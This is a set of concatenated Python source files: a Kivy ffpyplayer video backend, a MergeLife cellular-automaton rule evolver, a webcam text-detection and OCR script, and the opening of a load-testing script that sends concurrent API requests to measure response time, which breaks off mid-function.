the include directory will contain a directory called SDL2, which then holds
the headers).
Once defined, download the ffpyplayer git and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
..Note::
When kivy exits by closing the window while the video is playing,
it appears that the __del__ method of VideoFFPy
is not called. Because of this the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
flag set, when the main threads exists it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive hanging kivy. What this
means is that you have to be sure to delete the MediaPlayer object before
kivy exits by setting it to None.
'''
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
# Announce the ffpyplayer version once at import time.
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))

# Map ffpyplayer log-level names onto the matching kivy Logger callables.
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
               'fatal': Logger.critical, 'error': Logger.error,
               'warning': Logger.warning, 'info': Logger.info,
               'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
    """Forward a non-empty ffpyplayer log line to the matching kivy logger."""
    text = message.strip()
    if not text:
        return
    logger_func[level]('ffpyplayer: {}'.format(text))
# Install our callback only if no other component registered one already.
if not get_log_callback():
    set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
    """VideoBase implementation backed by ffpyplayer's MediaPlayer.

    Frames are pulled on a dedicated daemon thread (_next_frame_run) and
    handed to the kivy main thread through a Clock trigger (_redraw).
    yuv420p sources are converted to RGB on the GPU via the fragment shader
    below; every other source format is requested as rgba.
    """

    # GLSL fragment shader performing the YUV -> RGB conversion for the
    # yuv420p fast path (one luminance texture per plane).
    YUV_RGB_FS = """
    $HEADER$
    uniform sampler2D tex_y;
    uniform sampler2D tex_u;
    uniform sampler2D tex_v;

    void main(void) {
        float y = texture2D(tex_y, tex_coord0).r;
        float u = texture2D(tex_u, tex_coord0).r - 0.5;
        float v = texture2D(tex_v, tex_coord0).r - 0.5;
        float r = y + 1.402 * v;
        float g = y - 0.344 * u - 0.714 * v;
        float b = y + 1.772 * u;
        gl_FragColor = vec4(r, g, b, 1.0);
    }
    """

    # Clock trigger that schedules _redraw on the main thread.
    _trigger = None

    def __init__(self, **kwargs):
        self._ffplayer = None
        self._thread = None
        self._next_frame = None
        self._seek_queue = []
        self._ffplayer_need_quit = False
        self._trigger = Clock.create_trigger(self._redraw)
        super(VideoFFPy, self).__init__(**kwargs)

    def __del__(self):
        self.unload()

    def _player_callback(self, selector, value):
        # Called by MediaPlayer from its own thread; only 'quit' is handled,
        # and the actual teardown is deferred to the kivy main thread.
        if self._ffplayer is None:
            return
        if selector == 'quit':
            def close(*args):
                self.unload()
            Clock.schedule_once(close, 0)

    def _get_position(self):
        """Current playback timestamp in seconds (0 when no player exists)."""
        if self._ffplayer is not None:
            return self._ffplayer.get_pts()
        return 0

    def _set_position(self, pos):
        self.seek(pos)

    def _set_volume(self, volume):
        self._volume = volume
        if self._ffplayer:
            self._ffplayer.set_volume(self._volume)

    def _get_duration(self):
        if self._ffplayer is None:
            return 0
        return self._ffplayer.get_metadata()['duration']

    @mainthread
    def _do_eos(self):
        # Apply the configured end-of-stream policy, then notify listeners.
        if self.eos == 'pause':
            self.pause()
        elif self.eos == 'stop':
            self.stop()
        elif self.eos == 'loop':
            self.position = 0
        self.dispatch('on_eos')

    @mainthread
    def _change_state(self, state):
        self._state = state

    def _redraw(self, *args):
        # Runs on the main thread (via _trigger): upload the latest decoded
        # frame into textures and dispatch on_load / on_frame.
        if not self._ffplayer:
            return
        next_frame = self._next_frame
        if not next_frame:
            return
        img, pts = next_frame
        # (Re)create textures when the frame size changes or on first frame.
        if img.get_size() != self._size or self._texture is None:
            self._size = w, h = img.get_size()
            if self._out_fmt == 'yuv420p':
                # Three luminance textures (Y full size, U/V half size) are
                # combined into RGB by YUV_RGB_FS inside an offscreen FBO.
                w2 = int(w / 2)
                h2 = int(h / 2)
                self._tex_y = Texture.create(
                    size=(w, h), colorfmt='luminance')
                self._tex_u = Texture.create(
                    size=(w2, h2), colorfmt='luminance')
                self._tex_v = Texture.create(
                    size=(w2, h2), colorfmt='luminance')
                self._fbo = fbo = Fbo(size=self._size)
                with fbo:
                    BindTexture(texture=self._tex_u, index=1)
                    BindTexture(texture=self._tex_v, index=2)
                    Rectangle(size=fbo.size, texture=self._tex_y)
                fbo.shader.fs = VideoFFPy.YUV_RGB_FS
                fbo['tex_y'] = 0
                fbo['tex_u'] = 1
                fbo['tex_v'] = 2
                self._texture = fbo.texture
            else:
                self._texture = Texture.create(size=self._size, colorfmt='rgba')
            # XXX FIXME
            #self.texture.add_reload_observer(self.reload_buffer)
            self._texture.flip_vertical()
            self.dispatch('on_load')
        if self._texture:
            if self._out_fmt == 'yuv420p':
                dy, du, dv, _ = img.to_memoryview()
                self._tex_y.blit_buffer(dy, colorfmt='luminance')
                self._tex_u.blit_buffer(du, colorfmt='luminance')
                self._tex_v.blit_buffer(dv, colorfmt='luminance')
                self._fbo.ask_update()
                self._fbo.draw()
            else:
                self._texture.blit_buffer(
                    img.to_memoryview()[0], colorfmt='rgba')
            self.dispatch('on_frame')

    def _next_frame_run(self):
        # Worker-thread loop: wait for metadata, then pump frames and queued
        # seeks until unload() sets _ffplayer_need_quit.
        ffplayer = self._ffplayer
        sleep = time.sleep
        trigger = self._trigger
        did_dispatch_eof = False
        seek_queue = self._seek_queue
        # fast path, if the source video is yuv420p, we'll use a glsl shader for
        # buffer conversion to rgba
        while not self._ffplayer_need_quit:
            src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
            if not src_pix_fmt:
                sleep(0.005)
                continue
            if src_pix_fmt == 'yuv420p':
                self._out_fmt = 'yuv420p'
                ffplayer.set_output_pix_fmt(self._out_fmt)
            self._ffplayer.toggle_pause()
            break
        if self._ffplayer_need_quit:
            return
        # wait until loaded or failed, shouldn't take long, but just to make
        # sure metadata is available.
        # NOTE(review): time.clock() was removed in Python 3.8; on Python 3
        # this should become time.perf_counter() — confirm the supported
        # interpreter versions before changing.
        s = time.clock()
        while not self._ffplayer_need_quit:
            if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
                break
            # XXX if will fail later then?
            if time.clock() - s > 10.:
                break
            sleep(0.005)
        if self._ffplayer_need_quit:
            return
        # we got all the informations, now, get the frames :)
        self._change_state('playing')
        while not self._ffplayer_need_quit:
            if seek_queue:
                # Collapse all queued seeks into one absolute seek to the
                # last requested target (a fraction of total duration).
                vals = seek_queue[:]
                del seek_queue[:len(vals)]
                ffplayer.seek(
                    vals[-1] * ffplayer.get_metadata()['duration'],
                    relative=False)
                self._next_frame = None
            t1 = time.time()
            frame, val = ffplayer.get_frame()
            t2 = time.time()
            if val == 'eof':
                sleep(0.2)
                if not did_dispatch_eof:
                    self._do_eos()
                    did_dispatch_eof = True
            elif val == 'paused':
                did_dispatch_eof = False
                sleep(0.2)
            else:
                did_dispatch_eof = False
                if frame:
                    self._next_frame = frame
                    trigger()
                else:
                    # val is the suggested wait before the next frame; fall
                    # back to roughly one 30fps frame period when falsy.
                    val = val if val else (1 / 30.)
                    sleep(val)

    def seek(self, percent):
        # Queued here; consumed by _next_frame_run on the worker thread.
        if self._ffplayer is None:
            return
        self._seek_queue.append(percent)

    def stop(self):
        self.unload()

    def pause(self):
        if self._ffplayer and self._state != 'paused':
            self._ffplayer.toggle_pause()
            self._state = 'paused'

    def play(self):
        # Resume if paused; otherwise (re)create the player and frame thread.
        # The player starts paused and is unpaused by _next_frame_run once
        # metadata becomes available.
        if self._ffplayer and self._state == 'paused':
            self._ffplayer.toggle_pause()
            self._state = 'playing'
            return
        self.load()
        self._out_fmt = 'rgba'
        ff_opts = {
            'paused': True,
            'out_fmt': self._out_fmt
        }
        self._ffplayer = MediaPlayer(
            self._filename, callback=self._player_callback,
            thread_lib='SDL',
            loglevel='info', ff_opts=ff_opts)
        self._ffplayer.set_volume(self._volume)
        self._thread = Thread(target=self._next_frame_run, name='Next frame')
        self._thread.daemon = True
        self._thread.start()

    def load(self):
        self.unload()

    def unload(self):
        # Tear everything down; safe to call repeatedly.
        if self._trigger is not None:
            self._trigger.cancel()
        self._ffplayer_need_quit = True
        if self._thread:
            self._thread.join()
            self._thread = None
        if self._ffplayer:
            self._ffplayer = None
        self._next_frame = None
        self._size = (0, 0)
        self._state = ''
        self._ffplayer_need_quit = False
|
ml_utility.py | import argparse
import json
import multiprocessing as mp
import operator
import time
import sys
import mergelife
import ml_evolve as ev
import numpy as np
# Evolution state shared between the main loop and report(); worker
# processes only see copies inherited at fork time.
bestGenome = None      # best-scoring genome found in the current run
evalCount = 0          # evaluations performed in the current run
startTime = 0          # wall-clock time when evolve() started
timeLastUpdate = 0     # last time a progress line was printed
totalEvalCount = 0     # evaluations across all runs
runCount = 1           # 1-based index of the current evolutionary run
noImprovement = 0      # consecutive evaluations without a new best
waitingCount = 0       # genomes queued to workers but not yet scored
population = []        # current population of scored genomes
def subprocessScore(inputQueue, outputQueue):
    """Worker-process loop: pull genomes, score them, push results forever.

    NOTE(review): reads the module-level ``config`` set in __main__, relying
    on it being inherited at fork time; under the 'spawn' start method (e.g.
    Windows) this would raise NameError — confirm target platforms.
    """
    while True:
        genome = inputQueue.get()
        rule_str = genome['rule']
        width = config['config']['cols']
        height = config['config']['rows']
        ml_inst = mergelife.new_ml_instance(height, width, rule_str)
        result = mergelife.objective_function(ml_inst, config['config']['evalCycles'], config['objective'])
        outputQueue.put({'rule': rule_str, 'score': result['score'], 'run': genome['run']})
def report(config, inputQueue, genome):
    """Fold a newly scored *genome* into the run statistics.

    Tracks the best genome, prints a progress line at most once a minute,
    and once `patience` evaluations pass without improvement, optionally
    renders the best rule and restarts with a fresh random population.
    """
    global bestGenome, evalCount, totalEvalCount, timeLastUpdate, startTime, runCount, noImprovement, population
    requestStop = False
    evalCount += 1
    totalEvalCount += 1
    if bestGenome is None or genome['score'] > bestGenome['score']:
        bestGenome = genome
    else:
        noImprovement += 1
        if noImprovement > config['config']['patience']:
            requestStop = True
    now = time.time()
    # Throttled progress output (forced when we are about to stop).
    if requestStop or (now - timeLastUpdate > 60):
        elapsed = now - startTime
        perSec = totalEvalCount / elapsed
        perMin = int(perSec * 60.0)
        print("Run #{}, Eval #{}: {}, evals/min={}".format(runCount, evalCount, bestGenome, perMin))
        timeLastUpdate = now
    if requestStop:
        print("No improvement for {}, stopping...".format(config['config']['patience']))
        # Only rules above the threshold are worth rendering to disk.
        if bestGenome['score'] > config['config']['scoreThreshold']:
            render(config, bestGenome['rule'])
        # Reset per-run state and seed the next run.
        noImprovement = 0
        runCount += 1
        evalCount = 0
        population = []
        bestGenome = None
        randomPopulation(config, inputQueue)
def randomPopulation(config, queue):
    """Queue a full population of random rules for the workers to score."""
    global waitingCount
    for i in range(config['config']['populationSize']):
        queue.put({'score': None, 'rule': mergelife.random_update_rule(), 'run': runCount})
    waitingCount += config['config']['populationSize']
def evolve(config):
    """Run the steady-state evolutionary loop with one worker per CPU.

    Genomes travel to workers via inputQueue and return scored on
    outputQueue; crossover/mutation keeps roughly 2*cpus genomes in flight.
    """
    global timeLastUpdate, waitingCount, startTime
    cpus = mp.cpu_count()
    print("Forking for {}".format(cpus))
    processes = []
    startTime = time.time()
    timeLastUpdate = startTime
    cycles = config['config']['evalCycles']
    inputQueue = mp.Queue()
    outputQueue = mp.Queue()
    for i in range(cpus):
        # parent_conn, child_conn = mp.Pipe()
        # p = mp.Process(target=subprocessScore, args=(parent_conn,))
        p = mp.Process(target=subprocessScore, args=(inputQueue, outputQueue,))
        p.start()
        processes.append({'process': p})
    randomPopulation(config, inputQueue)
    population = []
    while True:
        g = outputQueue.get()
        waitingCount -= 1
        # Discard stragglers scored for a previous run.
        if g['run'] == runCount:
            if len(population) < config['config']['populationSize']:
                population.append(g)
                report(config, inputQueue, g)
            else:
                # Steady-state replacement: evict a tournament loser.
                target_idx = ev.select_tournament(population, cycles, operator.lt)
                population[target_idx] = g
                report(config, inputQueue, g)
        # Keep the workers fed with about 2*cpus genomes in flight.
        if waitingCount < cpus * 2:
            if np.random.uniform() < config['config']['crossover']:
                # Crossover
                parent1_idx = ev.select_tournament(population, cycles, operator.gt)
                parent2_idx = parent1_idx
                while parent1_idx == parent2_idx:
                    parent2_idx = ev.select_tournament(population, cycles, operator.gt)
                parent1 = population[parent1_idx]['rule']
                parent2 = population[parent2_idx]['rule']
                if parent1 != parent2:
                    child1, child2 = ev.crossover(parent1, parent2, cycles)
                    inputQueue.put({'rule': child1, 'score': None, 'run': runCount})
                    inputQueue.put({'rule': child2, 'score': None, 'run': runCount})
                    waitingCount += 2
            else:
                # Mutate
                parent_idx = ev.select_tournament(population, cycles, operator.gt)
                parent = population[parent_idx]['rule']
                child = ev.mutate(parent)
                inputQueue.put({'rule': child, 'score': None, 'run': runCount})
                waitingCount += 1
    # NOTE(review): unreachable — the `while True` loop above never breaks.
    for p in processes:
        p['process'].join()
def render(config, ruleText):
    """Run *ruleText* for the configured number of steps and save a PNG named after it."""
    cfg = config['config']
    width = cfg['cols']
    height = cfg['rows']
    ml_inst = mergelife.new_ml_instance(height, width, ruleText)
    for _ in range(cfg['renderSteps']):
        mergelife.update_step(ml_inst)
    filename = ruleText + ".png"
    mergelife.save_image(ml_inst, filename)
    print("Saved {}".format(filename))
def score(config, ruleText):
    """Evaluate *ruleText* against the configured objective and print its score."""
    cfg = config['config']
    width = cfg['cols']
    height = cfg['rows']
    ml_inst = mergelife.new_ml_instance(height, width, ruleText)
    result = mergelife.objective_function(ml_inst, cfg['evalCycles'], config['objective'], True)
    print("Final result: {}".format(result['score']))
if __name__ == '__main__':
    # Parse arguments, merge them over any config file, apply defaults, and
    # dispatch to the render / score / evolve subcommand.
    parser = argparse.ArgumentParser(description='Mergelife Utility')
    parser.add_argument('--rows', nargs=1, type=int, help="the number of rows in the MergeLife grid")
    parser.add_argument('--cols', nargs=1, type=int, help="the number of cols in the MergeLife grid")
    parser.add_argument('--renderSteps', nargs=1, type=int, help="the number of steps to render")
    parser.add_argument('--zoom', nargs=1, type=int, help="the pixel size for rendering")
    parser.add_argument('--config', nargs=1, type=str, help="the path to a config file")
    # BUG FIX: help text was a copy-paste leftover ("an integer for the
    # accumulator"); describe the actual positional argument.
    parser.add_argument('command', nargs=argparse.REMAINDER, metavar='command', type=str, choices=['evolve', 'score', 'render'],
                        help='the command to run: evolve, score or render')
    args = parser.parse_args()

    if args.config is None:
        config = {'config': {}}
    else:
        with open(args.config[0]) as f:
            config = json.load(f)

    # Override with command line params, if they are there
    if args.rows is not None:
        config['config']['rows'] = args.rows[0]
    if args.cols is not None:
        config['config']['cols'] = args.cols[0]
    if args.renderSteps is not None:
        config['config']['renderSteps'] = args.renderSteps[0]
    if args.config is not None:
        config['config']['config'] = args.config[0]
    if args.zoom is not None:
        config['config']['zoom'] = args.zoom[0]

    # Default values
    if 'cols' not in config['config']:
        config['config']['cols'] = 100
    if 'rows' not in config['config']:
        config['config']['rows'] = 100
    # BUG FIX: the renderSteps default was guarded by the wrong key
    # ('evalCycles'), so renderSteps could remain unset.
    if 'renderSteps' not in config['config']:
        config['config']['renderSteps'] = 250
    # BUG FIX: a missing 'zoom' previously assigned cols = 5, silently
    # shrinking the grid instead of defaulting the zoom level.
    if 'zoom' not in config['config']:
        config['config']['zoom'] = 5

    # BUG FIX: a missing command previously crashed with IndexError.
    if not args.command:
        parser.error("no command given; expected one of: evolve, score, render")

    if args.command[0] == 'render':
        if len(args.command) < 2:
            print("Must specify what rule hex-code you wish to render.")
            sys.exit(0)
        else:
            render(config, args.command[1])
    elif args.command[0] == 'score':
        score(config, args.command[1])
    elif args.command[0] == 'evolve':
        evolve(config)
|
fianl_verison.py |
##load model
import cv2
import numpy as np
import re
import threading
from multiprocessing import Queue #使用多核心的模組 Queue
import logging
import time
from PIL import Image, ImageDraw
from keras.preprocessing import image
from keras.applications.vgg16 import preprocess_input
import cfg
from network import East
from preprocess import resize_image
from nms import nms
import os
from config import *
from apphelper.image import union_rbox,adjust_box_to_origin,base64_to_PIL
from application import trainTicket,idcard
# --- Engine selection & model bootstrap (runs at import time) ---------------
# The flags read here (yoloTextFlag, AngleModelFlag, ocrFlag, GPU, GPUID,
# IMGSIZE, ocr_redis, chineseModel, LSTMFLAG, ocrModel*) come from
# `from config import *`.
if yoloTextFlag =='keras' or AngleModelFlag=='tf' or ocrFlag=='keras':
    if GPU:
        # Pin the visible GPU and cap TensorFlow's memory usage.
        os.environ["CUDA_VISIBLE_DEVICES"] = str(GPUID)
        import tensorflow as tf
        from keras import backend as K
        config = tf.ConfigProto()
        config.gpu_options.allocator_type = 'BFC'
        config.gpu_options.per_process_gpu_memory_fraction = 0.3 ## maximum fraction of GPU memory to use
        config.gpu_options.allow_growth = True ##allow GPU memory usage to grow dynamically
        K.set_session(tf.Session(config=config))
        K.get_session().run(tf.global_variables_initializer())
    else:
        ##CPU-only startup
        os.environ["CUDA_VISIBLE_DEVICES"] = ''
# Select the text-detection backend and its image-scaling parameters.
if yoloTextFlag=='opencv':
    scale,maxScale = IMGSIZE
    from text.opencv_dnn_detect import text_detect
elif yoloTextFlag=='darknet':
    scale,maxScale = IMGSIZE
    from text.darknet_detect import text_detect
elif yoloTextFlag=='keras':
    scale,maxScale = IMGSIZE[0],2048
    from text.keras_detect import text_detect
else:
    print( "err,text engine in keras\opencv\darknet")
from text.opencv_dnn_detect import angle_detect
# Select the OCR backend; redis mode delegates to a task queue, otherwise a
# CRNN model is loaded in-process.
if ocr_redis:
    ##concurrent multi-task recognition via a redis-backed queue
    from apphelper.redisbase import redisDataBase
    ocr = redisDataBase().put_values
else:
    from crnn.keys import alphabetChinese,alphabetEnglish
    if ocrFlag=='keras':
        from crnn.network_keras import CRNN
        if chineseModel:
            alphabet = alphabetChinese
            if LSTMFLAG:
                ocrModel = ocrModelKerasLstm
            else:
                ocrModel = ocrModelKerasDense
        else:
            ocrModel = ocrModelKerasEng
            alphabet = alphabetEnglish
            # English model is always LSTM-based.
            LSTMFLAG = True
    elif ocrFlag=='torch':
        from crnn.network_torch import CRNN
        if chineseModel:
            alphabet = alphabetChinese
            if LSTMFLAG:
                ocrModel = ocrModelTorchLstm
            else:
                ocrModel = ocrModelTorchDense
        else:
            ocrModel = ocrModelTorchEng
            alphabet = alphabetEnglish
            LSTMFLAG = True
    elif ocrFlag=='opencv':
        from crnn.network_dnn import CRNN
        ocrModel = ocrModelOpencv
        alphabet = alphabetChinese
    else:
        print( "err,ocr engine in keras\opencv\darknet")
    # Number of output classes: alphabet plus the CTC blank symbol.
    nclass = len(alphabet)+1
    if ocrFlag=='opencv':
        crnn = CRNN(alphabet=alphabet)
    else:
        crnn = CRNN( 32, 1, nclass, 256, leakyRelu=False,lstmFlag=LSTMFLAG,GPU=GPU,alphabet=alphabet)
    if os.path.exists(ocrModel):
        crnn.load_weights(ocrModel)
    else:
        print("download model or tranform model with tools!")
    ocr = crnn.predict_job
from main import TextOcrModel
# Combined pipeline: detection + orientation + OCR.
model = TextOcrModel(ocr,text_detect,angle_detect)
#def predict(img):
#image = cv2.putText(img,digital_num,(50,50),cv2.FONT_HERSHEY_COMPLEX,2,(0,0,255),10)
#cv2.imshow('frame2', image)
def t2_start(q, img):
    """Launch the OCR worker `T2_job` for *img* on a background thread,
    reporting its result through queue *q*."""
    threading.Thread(target=T2_job, args=(q, img)).start()
def T2_job(q,img):
    """Worker thread: run text detection + OCR on *img*, keep lines that look
    like alphanumeric codes, and push any 8-digit number found in the first
    matching line onto queue *q*. Logs results/timing to logging.txt."""
    print('T2 start')
    t = time.time()
    if img is not None:
        img = np.array(img)
        #H,W = img.shape[:2]
        ## predict
        result,angle= model.model(img,
                                    scale=scale,
                                    maxScale=maxScale,
                                    detectAngle=True,##whether to detect text orientation (controlled via web params)
                                    MAX_HORIZONTAL_GAP=100,##max gap between characters when merging into text lines
                                    MIN_V_OVERLAPS=0.6,
                                    MIN_SIZE_SIM=0.6,
                                    TEXT_PROPOSALS_MIN_SCORE=0.1,
                                    TEXT_PROPOSALS_NMS_THRESH=0.3,
                                    TEXT_LINE_NMS_THRESH = 0.99,##IoU threshold between text lines
                                    LINE_MIN_SCORE=0.1,
                                    leftAdjustAlph=0.01,##extend detected text lines to the left
                                    rightAdjustAlph=0.01,##extend detected text lines to the right
                                                         )
        # Keep only lines matching letters followed by optional digits.
        # NOTE(review): [A-z] also matches punctuation between 'Z' and 'a';
        # presumably [A-Za-z] was intended — confirm before changing.
        p = re.compile(r'^[A-z]+[0-9]*$')
        result = union_rbox(result,0.2)
        print(result)
        res = [{'text':x['text'],
                'name':str(i),
                'box':{'cx':x['cx'],
                       'cy':x['cy'],
                       'w':x['w'],
                       'h':x['h'],
                       'angle':x['degree']}
               } for i,x in enumerate(result) if re.match(p,x['text'])]
        #print("res:" + str(res))
        logging.basicConfig(filename='logging.txt',
                            filemode='w',
                            format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
                            datefmt='%H:%M:%S',
                            level=logging.DEBUG)
        logging.info("res:" + str(res))
        if res != []:
            # Extract the first 8-digit run from the best candidate line.
            digital_re = re.compile(r'\d{8}')
            digital_num = re.findall(digital_re,res[0]['text'])
            q.put(digital_num)
            #pre_enable=1
    print('T2 finish')
    timeTake = time.time()-t
    logging.info("Execution time: " + str(timeTake))
# Build the EAST text-detection network and load its pretrained weights
# (path comes from cfg.model_weights_path).
east = East()
east_detect = east.east_network()
east_detect.summary()
east_detect.load_weights(cfg.model_weights_path)
def sigmoid(x):
    """Element-wise logistic function: `y = 1 / (1 + exp(-x))`."""
    return np.reciprocal(1.0 + np.exp(-x))
def crop_rectangle(img, geo):
    """Crop the patch covering the min-area rectangle around polygon *geo*.

    The whole image is rotated so the rectangle becomes axis-aligned, then a
    patch padded by 100 px per dimension is extracted around its center.
    """
    rect = cv2.minAreaRect(geo.astype(int))
    (cx, cy), (rw, rh), angle = rect
    print(angle)
    center = (int(cx), int(cy))
    if angle > -45:
        size = (int(rw + 100), int(rh + 100))
    else:
        # Rectangle is "standing"; swap the sides and rotate by an extra
        # quarter turn (−270° ≡ +90°) so the long side ends up horizontal.
        size = (int(rh + 100), int(rw) + 100)
        angle -= 270
    height, width = img.shape[0], img.shape[1]
    rotation = cv2.getRotationMatrix2D(center, angle, 1)
    rotated = cv2.warpAffine(img, rotation, (width, height))
    return cv2.getRectSubPix(rotated, size, center)
def predict(east_detect, img_path, pixel_threshold, quiet=False):
    """Run EAST detection on the image at *img_path*.

    Draws each valid quad on a copy of the image and saves it to output/;
    optionally crops each quad to output_crop/ (cfg.detection_box_crop) and
    writes the rescaled quad geometries to output_txt/ (cfg.predict_write2txt).
    *pixel_threshold* is the minimum score for a pixel to count as text.
    """
    img = image.load_img(img_path)
    d_wight, d_height = resize_image(img, cfg.image_size)
    img = img.resize((d_wight, d_height), Image.NEAREST).convert('RGB')
    img = image.img_to_array(img)
    img = preprocess_input(img, mode='tf')
    x = np.expand_dims(img, axis=0)
    y = east_detect.predict(x)
    y = np.squeeze(y, axis=0)
    # First 3 channels are raw scores; squash them to probabilities.
    y[:, :, :3] = sigmoid(y[:, :, :3])
    cond = np.greater_equal(y[:, :, 0], pixel_threshold)
    activation_pixels = np.where(cond)
    quad_scores, quad_after_nms = nms(y, activation_pixels)
    with Image.open(img_path) as im:
        im_array = image.img_to_array(im.convert('RGB'))
        d_wight, d_height = resize_image(im, cfg.image_size)
        # Ratios to map quads from the resized image back to the original.
        scale_ratio_w = d_wight / im.width
        scale_ratio_h = d_height / im.height
        im = im.resize((d_wight, d_height), Image.NEAREST).convert('RGB')
        quad_im = im.copy()
        quad_draw = ImageDraw.Draw(quad_im)
        txt_items = []
        flag = False
        for score, geo, s in zip(quad_scores, quad_after_nms,
                                 range(len(quad_scores))):
            if np.amin(score) > 0:
                flag = True
                quad_draw.line([tuple(geo[0]),
                                tuple(geo[1]),
                                tuple(geo[2]),
                                tuple(geo[3]),
                                tuple(geo[0])], width=2, fill='blue')
                rescaled_geo = geo / [scale_ratio_w, scale_ratio_h]
                rescaled_geo_list = np.reshape(rescaled_geo, (8,)).tolist()
                txt_item = ','.join(map(str, rescaled_geo_list))
                txt_items.append(txt_item + '\n')
                if cfg.detection_box_crop:
                    img_crop = crop_rectangle(im_array, rescaled_geo)
                    cv2.imwrite(os.path.join('output_crop', img_path.split('/')[-1].split('.')[0] + '.jpg'),cv2.cvtColor(img_crop, cv2.COLOR_BGR2RGB))
            elif not quiet:
                print('quad invalid with vertex num less then 4.')
        # Only save the annotated image if at least one quad was valid.
        if flag:
            quad_im.save(os.path.join('output', img_path.split('/')[-1].split('.')[0] + '_predict.jpg'))
        if cfg.predict_write2txt and len(txt_items) > 0:
            with open(os.path.join("output_txt", img_path.split('/')[-1].split('.')[0] + '.txt'), 'w') as f_txt:
                f_txt.writelines(txt_items)
def predict_num(frame):
    """Persist *frame* to disk and run EAST text detection on the snapshot."""
    snapshot = "output.jpg"
    cv2.imwrite(snapshot, frame)
    predict(east_detect, snapshot, cfg.pixel_threshold)
def main(q):
    """Live loop: capture webcam frames, run EAST detection on each, OCR the
    annotated detection in a background thread, and overlay the most recent
    recognized number on the preview window until 'q' is pressed.

    Results arrive asynchronously through queue *q*; the last value is kept
    in the module globals res_before/res_new.
    """
    cap = cv2.VideoCapture(0)
    if not cap.isOpened():
        print("Cannot open camera")
        exit()
    while(True):
        # Capture frame-by-frame
        ret, frame = cap.read()
        frame = cv2.resize(frame, (640, 480), interpolation = cv2.INTER_LINEAR)
        # if frame is read correctly ret is True
        if not ret:
            print("Can't receive frame (stream end?). Exiting ...")
            break
        # color to gray
        #gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # Save the frame and run text detection on the snapshot.
        cv2.imwrite("output.jpg", frame)
        predict(east_detect, "output.jpg", cfg.pixel_threshold)
        #im = Image.open("output.jpg")
        # If detection produced an annotated image, hand it to the OCR thread.
        if os.path.exists(r'C:\Users\test\Desktop\final_presentation\output\output_predict.jpg'):
            img = cv2.imread(r'C:\Users\test\Desktop\final_presentation\output\output_predict.jpg')
            #os.remove(r'C:\Users\test\Desktop\final_presentation\output_crop\output.jpg')
            t2_start(q,img)
        global res_before,res_new
        # Drain at most one OCR result from the queue.
        while(q.empty()==False):
            res_before=q.get()
            #cv2.putText(img, "result = "+str(label_dict[q.get()]), (0,25), 0, 1, (0,255,0),2)
            print(res_before)
            break
        #cv2.imshow('frame', frame)
        #img = frame
        if(res_new!=res_before):
            res_new=res_before
            #t3_start(client)
        else:
            # Overlay the last stable result on the preview frame.
            cv2.putText(frame, "result = "+ str(res_new), (0,25), 0, 1, (0,255,0),2)
        cv2.imshow("frame",frame)
        # Press the 'q' key to leave the loop.
        if cv2.waitKey(1) == ord('q'):
            #cv2.imwrite('output.jpg', frame)
            break
    # Release the camera device.
    cap.release()
    cv2.destroyAllWindows()
    #thread.join()
if __name__ == '__main__':
    # Remove a stale prediction image from a previous run so `main` does not
    # pick up an outdated detection result on its first iteration.
    stale = r'C:\Users\test\Desktop\final_presentation\output\output_predict.jpg'
    try:
        os.remove(stale)
    # BUG FIX: was a bare `except:` which also swallowed KeyboardInterrupt
    # and SystemExit; only filesystem errors are expected here.
    except OSError:
        print("not exist")
    q = Queue()
    # Previous / current OCR result, shared with main() via globals.
    res_before = None
    res_new = None
    main(q)
|
spawn_api_requests.py | #!/usr/bin/env python
import requests
import numpy as np
from multiprocessing import Process, Manager, Lock
import traceback
import signal
import sys
import argparse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
###############################################################################
# Simple script for testing site reponse time against concurrent requests #
# Developed with Python 2.7.6. Tested on OS X and Linux #
# Example Usage: #
# python spawn_api_requests.py --concurrency 15 #
###############################################################################
def signal_term_handler(signal, frame):
    """SIGTERM handler: report the interruption and terminate the script.

    If this fails and worker processes are left running, clean up with:
    kill -9 `ps -ef | grep -i python | grep -i spawn_api_requests | head -n1 | awk '{ print $2 }'`
    """
    print("Script forced to aborted by user")
    sys.exit()
def status(code):
    """Return *code* as a colorized string (unix terminals only):
    green for 2XX, red for 4XX/5XX, yellow otherwise."""
    text = str(code)
    if text.startswith("2"):
        color = "\033[92m"
    elif text[0] in "45":
        color = "\033[91m"
    else:
        color = "\033[93m"
    return color + text + "\033[0m"
def safe_print(string, lock):
    """Print *string* while holding *lock*.

    print() itself is threadsafe, but newlines from concurrent workers can
    interleave; serializing the whole call keeps output lines intact.
    """
    with lock:
        print(string)
# Method to authenticate and send requests for each worker
def send_http_request(results, times, pages, authentication, timeout, lock, number=1):
    """Worker entry point: optionally authenticate, then GET every endpoint.

    Updates the shared `results` counters and appends per-request elapsed
    times (microseconds) to `times`. `number` identifies this worker in log
    output. NOTE(review): `pages` is accepted but unused — endpoints come
    from the global `url_details`; kept for signature compatibility.
    """
    # Optional authentication step
    if authentication['api_authentication']['enabled']:
        try:
            print("\nAuthenticating thread number %s" %(number))
            request_type = authentication['api_authentication']['request_type']
            login_url = "%s://%s/%s" %(url_details['protocol'], url_details['url'], authentication['api_authentication']['endpoint'])
            header = {'Content-Type': authentication['api_authentication']['payload_format']}
            payload = authentication['api_authentication']['payload_as_string']
            r = requests.request(request_type, url=login_url, headers=header, data=payload, verify=False, allow_redirects=True)
        except Exception as e:
